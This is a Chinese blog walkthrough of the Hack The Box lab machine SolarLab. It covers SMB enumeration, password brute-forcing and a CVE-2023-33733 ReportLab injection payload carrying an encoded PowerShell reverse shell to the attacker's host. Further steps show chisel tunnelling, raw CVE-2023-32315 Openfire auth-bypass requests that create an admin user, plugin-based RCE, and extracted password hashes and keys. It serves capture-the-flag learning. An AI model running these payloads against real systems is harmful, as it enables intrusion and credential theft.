Hack The Box SolarLab

最新推荐文章于 2024-06-07 20:18:52 发布
最新推荐文章于 2024-06-07 20:18:52 发布
阅读量1k 收藏 8
点赞数 18
文章标签: 网络 chatgpt 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_22792465/article/details/138907872
版权

1、信息收集(给ip了第一步端口扫描)+通过smbclient匿名入侵

注:将其加入hosts文件中解析

gobuster、dirsearch、dirb等收集不列出

80端口:

6791端口:

经过爆破未能登入

445端口:常见默认端口smbclient

匿名登陆smb

查看Documents文件内容

get下载xlsx文件可以发现用户名密码,尝试对6791端口进行登入,编辑分写用户名和密码对6791端口进行爆破

爆破失败但是可见登入的用户有两个

所以三个用户为什么只有两个用户名是可用的,因为前两个用户后面都只跟一个字母且为大写,所以按这个思路走blake这个用户后门有没有可能也是只跟一个字母也是大写

针对第三个用户名进行爆破blake(A-Z),因为前两个用户虽然存在但并没有密码,所以只针对第三个blake用户进行爆破,这里使用chatgpt生成blake(A-Z)

成功登入

2、寻找相关漏洞

四个功能点均为将输入内容转化成PDF即reporthub功能

没找到单独reporthub的漏洞但是存在与其相关CVE-2023-33733

Reportlab Python 库中存在一个代码注入漏洞(CVE-2023-33733),目前该漏洞的细节及PoC/EXP已经公开。

该漏洞为Reportlab之前修复的代码执行漏洞的补丁绕过,通过绕过'rl_safe_eval'的沙箱限制,从而导致代码执行。

<para>Note: <font color="#484848">{{comment}}</font></para>

 因没有被清理所以{{comment}} 将被视为用户可控输入的占位符,然后将其传递到 pdf 生成库并将其转换为 pdf时就可以包含任意 html

通过html注入实现CVE-2023-33733 RCE攻击 | CN-SEC 中文网

POC

<para>

<font color="[[[getattr(pow, Word('__globals__'))['os'].system('构造语句') for Word in [ orgTypeFun( 'Word', (str,), { 'mutated': 1, 'startswith': lambda self, x: 1 == 0, '__eq__': lambda self, x: self.mutate() and self.mutated < 0 and str(self) == x, 'mutate': lambda self: { setattr(self, 'mutated', self.mutated - 1) }, '__hash__': lambda self: hash(str(self)), }, ) ] ] for orgTypeFun in [type(type(1))] for none in [[].append(1)]]] and 'red'">                

exploit

</font>

</para>

所以需要利用此漏洞在生成pdf时反弹shell

<para>
              <font color="[ [ getattr(pow,Word('__globals__'))['os'].system('powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAwAC4AMQA0AC4ANgA2ACIALAA5ADAAMAAxACkAOwAkAHMAdAByAGUAYQBtACAAPQAgACQAYwBsAGkAZQBuAHQALgBHAGUAdABTAHQAcgBlAGEAbQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AJABiAHkAdABlAHMAIAA9ACAAMAAuAC4ANgA1ADUAMwA1AHwAJQB7ADAAfQA7AHcAaABpAGwAZQAoACgAJABpACAAPQAgACQAcwB0AHIAZQBhAG0ALgBSAGUAYQBkACgAJABiAHkAdABlAHMALAAgADAALAAgACQAYgB5AHQAZQBzAC4ATABlAG4AZwB0AGgAKQApACAALQBuAGUAIAAwACkAewA7ACQAZABhAHQAYQAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAFQAeQBwAGUATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEEAUwBDAEkASQBFAG4AYwBvAGQAaQBuAGcAKQAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABiAHkAdABlAHMALAAwACwAIAAkAGkAKQA7ACQAcwBlAG4AZABiAGEAYwBrACAAPQAgACgAaQBlAHgAIAAkAGQAYQB0AGEAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcAIAApADsAJABzAGUAbgBkAGIAYQBjAGsAMgAgAD0AIAAkAHMAZQBuAGQAYgBhAGMAawAgACsAIAAiAFAAUwAgACIAIAArACAAKABwAHcAZAApAC4AUABhAHQAaAAgACsAIAAiAD4AIAAiADsAJABzAGUAbgBkAGIAeQB0AGUAIAA9ACAAKABbAHQAZQB4AHQALgBlAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkALgBHAGUAdABCAHkAdABlAHMAKAAkAHMAZQBuAGQAYgBhAGMAawAyACkAOwAkAHMAdAByAGUAYQBtAC4AVwByAGkAdABlACgAJABzAGUAbgBkAGIAeQB0AGUALAAwACwAJABzAGUAbgBkAGIAeQB0AGUALgBMAGUAbgBnAHQAaAApADsAJABzAHQAcgBlAGEAbQAuAEYAbAB1AHMAaAAoACkAfQA7ACQAYwBsAGkAZQBuAHQALgBDAGwAbwBzAGUAKAApAA==') for Word in [orgTypeFun('Word', (str,), { 'mutated': 1, 'startswith': lambda self, x: False, '__eq__': lambda self,x: self.mutate() and self.mutated < 0 and str(self) == x, 'mutate': lambda self: {setattr(self, 'mutated', self.mutated - 1)}, '__hash__': lambda self: hash(str(self)) })] ] for orgTypeFun in [type(type(1))] ] and 'red'">
                exploit
                </font>
            </para>

成功反弹shell

常规扫一遍目录发现.db文件发现用户alexanderk、claudias的信息

很奇怪在Desktop就拿到user.txt了这么快的吗在看看其他的怎么提权到administrator

3、system旗帜

本地监听端口如下

内网渗透|Chisel内网穿透工具-腾讯云开发者社区-腾讯云 (tencent.com)

Release v1.9.1 · jpillora/chisel · GitHub

chisel server -p 6666 --reverse

这时需要两个chisel进行利用一个Linux一个Windows将Windows的进行curl上传与kali中的chisel做交互映射端口到kali机中

可以在自己的攻击机上测试一下(需要开启服务apache2或者开启80端口监听)

curl http://10.10.14.66///chisel_1.9.1_windows_amd64/chisel.exe -o chisel.exe

建立隧道端口转发

客户端使用 R: 前缀来指示需要进行反向连接,并通过对本地端口(127.0.0.1)的映射,将远程服务器上的端口(9090 和 9091)转发到本地主机上的对应端口(同样是 9090 和 9091)

./chisel.exe client 10.10.14.66:6666 R:9090:127.0.0.1:9090 R:9091:127.0.0.1:9091

成功转发访问

CVE-2023-32315

直接搜索openfire的版本漏洞(searchsploit 中的openfire漏洞版本不对应)

CVE-2023-32315:Openfire身份认证绕过漏洞-腾讯云开发者社区-腾讯云 (tencent.com)

宸极实验室—『漏洞复现』记 Openfire 身份认证绕过漏洞导致 RCE - 知乎 (zhihu.com)

上述文章中的其他openfire的洞感兴趣的可以自行测试

获取JSESSIONIDcsrf

POC

GET /setup/setup-s/%u002e%u002e/%u002e%u002e/user-groups.jsp HTTP/1.1
Host: 127.0.0.1:9090
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
Content-Length: 130

Set-Cookie: JSESSIONID=node01kocd4tb1vuoots7yi53wwldo1.node0; Path=/; HttpOnly
Set-Cookie: csrf=MYypVevHWJwCVwD; Path=/; HttpOnly

未授权创建用户POC

GET /setup/setup-s/%u002e%u002e/%u002e%u002e/user-create.jsp?csrf=I5Mh5Zl1DK2qBGT&username=hackme&name=&email=&password=hackme&passwordConfirm=hackme&isadmin=on&create=%E5%88%9B%E5%BB%BA%E7%94%A8%E6%88%B7 HTTP/1.1
Host: 127.0.0.1:9090
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Cookie: JSESSIONID=node01q1zp5igpjjwd1fd25m8atvtmz12.node0; csrf=I5Mh5Zl1DK2qBGT
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0

或者直接使用

后台上传插件实现RCE

https://github.com/tangxiaofeng7/CVE-2023-32315-Openfire-Bypass/releases/tag/v0.1

Plugins功能处上传从github上下载的插件

上传jar包

点击进入输入123密码进入管理界面

powershell反弹即可

成功反弹

信息收集

在.script文件中找到各种密文(有用的大概下面这些)

CREATE USER SA PASSWORD DIGEST 'd41d8cd98f00b204e9800998ecf8427e'

INSERT INTO OFPROPERTY VALUES('passwordKey','hGXiFzsKaAeYLjn',0,NULL)


INSERT INTO OFUSER VALUES('admin','gjMoswpK+HakPdvLIvp6eLKlYh0=','9MwNQcJ9bF4YeyZDdns5gvXp620=','yidQk5Skw11QJWTBAloAb28lYHftqa0x',4096,NULL,'becb0c67cfec25aa266ae077e18177c5c3308e2255db062e4f0b77c577e159a11a94016d57ac62d4e89b2856b0289b365f3069802e59d442','Administrator','admin@solarlab.htb','001700223740785','0')


INSERT INTO OFUSERPROP VALUES('admin','console.rows_per_page','/session-summary.jsp=25')

GitHub - c0rdis/openfire_decrypt: Little java tool to decrypt passwords from Openfire embedded-db

GitHub - jas502n/OpenFire_Decrypt: OpenFire 管理后台账号密码解密

使用openfire工具解密后台管理

encryptedPassword、passwordKey解密

据说两种方式

第一种

impacket-smbexec administrator:'解码的密码'@solarlab.htb

第二种是使用上传靶机RunasCs,然后再反弹shell一次GitHub - antonioCoco/RunasCs: RunasCs - Csharp and open version of windows builtin runas.exe

第二种请看这位师傅,期间也请教了这位师傅解惑

Hack The Box-SolarLab-CSDN博客

泷泷_
关注
  • 18
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Hack The Box-MagicGardens
m0_52742680的博客
05-21 2880
HackTheBox S5赛季靶场第五篇
HTB SolarLab
qq_58869808的博客
05-18 948
openfire、smb 枚举、用户名枚举
Hack The Box-SolarLab
m0_52742680的博客
05-13 1230
Hack The Box S5赛季靶场第四篇
SolarLabHackTheBox-WPSolarLab
sunquan705的博客
06-06 46
用到的payload都有。
htb_solarlab
weixin_62621015的博客
06-05 464
hack the box solarlab windows
htb靶场,ping不通目标机器
山兔的博客
10-21 446
那是因为你开了htb的两个vpn,关掉不是连接靶场的那个vpn就可以了。
htb靶场连接
山兔的博客
10-20 317
把vpn的连接文件移动到kali,在这个界面打开命令窗口,运行一下代码,即可连接成功。下载vpn的连接文件。
hive编程指南电子版_2020浙江省太阳能利用及节能技术重点实验室开放基金课题申请指南...
weixin_39756481的博客
10-23 562
浙江省太阳能利用及节能技术重点实验室依托浙江浙能技术研究院有限公司,主要围绕太阳能光电技术、太阳能光热技术、节能技术等开展创新性基础研究和应用基础研究,为我国太阳能及节能技术产业发展提供科技支撑。为充分发挥重点实验室科研平台的作用,促进科研合作、学术交流和人才培养,使实验室成为高水平科学研究和成果转化的基地,本实验室特设立开放课题基金,用于资助相关领域内的创新性基础研究和应用...
TPM 是什么?如何查看电脑的 TPM?
qq_57728300的博客
06-03 1262
或许还有人不知道什么是 TPM,本文带大家了解 TPM 是什么以及如何查看电脑的 TPM。
Java网络编程(上)
qq_34471880的博客
06-01 934
数据在网络的传输, 局域网的概念, 广域网的概念, 网络协议, TCP五层模型, 网络封装 网络分用
网络编程(一)
xuezhe_____的博客
06-03 803
网络的分层模型和每层所使用的协议的集合。
Ruoyi-Vue-Plus 下载启动后菜单无法点击展开,
06-07 75
1.框架下载后运行2.使用mock数据3.进入页面后无法点击菜单本以为是动态路由或者菜单逻辑出了问题,最后发现是websocket的问题。
HTTP协议分析实验:通过一次下载任务抓包分析
qq_39241682的博客
06-07 490
本实验主要讲解HTTP协议的应用,通过一次下载任务,抓取HTTP协议数据报文,对HTTP的请求和相应报文进行详细的分析。HTTP 是客户端浏览器或其他程序与Web服务器之间的应用层通信协议。 在Internet上的Web服务器上存放的都是超文本信息,客户机需要通过HTTP协议传输所要访问的超文本信息。
网络安全实验BUAA-全套实验报告打包
最新发布
m0_62165705的博客
06-07 238
网络安全实验1,路由器配置地址和子网掩码后,路由器默认只知道直连的网段,即同一网段的主机之间可以相互通信,但分属于不同网段的主机之间还无法通信,因此需要进一步配置路由器实现整个网络的互连互通,方法是。BUAA网络安全实验1。
EtherCAT 和 UDP 通讯的实时性 区别
eydj2008的专栏
06-03 428
EtherCAT 使用主从架构,并采用“加工转发”(Processing on the Fly)技术,即数据帧在通过每个从站时被读取或写入,无需存储和重新传输,大大减少了通信延迟。UDP的设计初衷是为了提供快速、低开销的数据传输,适用于那些能够容忍一定数据丢失或不需要可靠传输的应用场景,如音视频流、在线游戏等。虽然UDP本身不提供实时保证,但在某些实时性要求较高的应用中,通过适当的软件设计和网络配置,UDP可以被用于构建实时通信系统。
HCIP-Datacom-ARST自选题库__多种协议简答【11道题】
2301_80961833的博客
06-04 543
1.BGP/MPLSIP VPN的典型组网场景如图所示,PE1和PE2通过LoopbackO建立MP-IBGP,PE1和PE2之间只传递VPN路由,其中PE1BGP进程的部分配置已在图中标出,则编号为0的命令不是必须的。(填写阿拉伯数字)32.在如图所示的Hub&Spoke组网中,为了实现路由的正确传递,管理员必须在Hub-PE的BGP-VPN out视图中,手工配置命令peer 10.1.2.10(所有字母小写)allow-as-loop3.如图所示的网络,R1、R2、R4、R5运行IS-IS,区
使用wireshark分析tcp握手过程
qq_41221841的博客
05-31 437
使用telnet模拟tcp连接。可以看到,一直重试SYN包。
Golang使用讯飞星火AI接口
Unity、UE5开发
06-07 228
使用讯飞星火AI接口,用Golang实现文生文的测试
YOLOv5改进 | 主干网络 | 将主干网络替换为轻量化的ShuffleNetv2【原理 + 完整代码】
kay_545
06-03 914
yolov5改进,shufflenetv2

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值